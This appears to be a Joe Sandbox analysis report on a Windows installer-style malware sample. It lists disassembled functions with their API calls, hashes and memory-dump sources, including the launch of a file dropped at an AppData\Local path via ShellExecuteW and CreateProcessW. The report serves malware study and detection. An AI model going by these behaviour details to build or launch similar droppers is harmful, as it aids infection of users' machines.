API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\magmaet\clenched
API String ID: 1892508949-536943358
Opcode ID: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
Opcode Fuzzy Hash: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E

Function 00405863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
CloseHandle.KERNEL32(0040A230), ref: 00405899

Strings

Error launching installer, xrefs: 00405876

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78

Function 00406C7C Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44

Function 00406E7D Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45

Function 00406B93 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45

Function 00406698 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45

Function 00406AE6 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44

Function 00406C04 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45

Function 00406B50 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44

Function 004031EF Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403203

Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
SetFilePointer.KERNELBASE(00A495B9,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E

Function 004021EA Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(?,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0), ref: 004064D1
Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD

lstrlenW.KERNEL32 ref: 0040222A
lstrlenW.KERNEL32(00000000), ref: 00402235
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 00401E08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched,?), ref: 00401E52

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401E3B

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\magmaet\clenched
API String ID: 587946157-536943358
Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
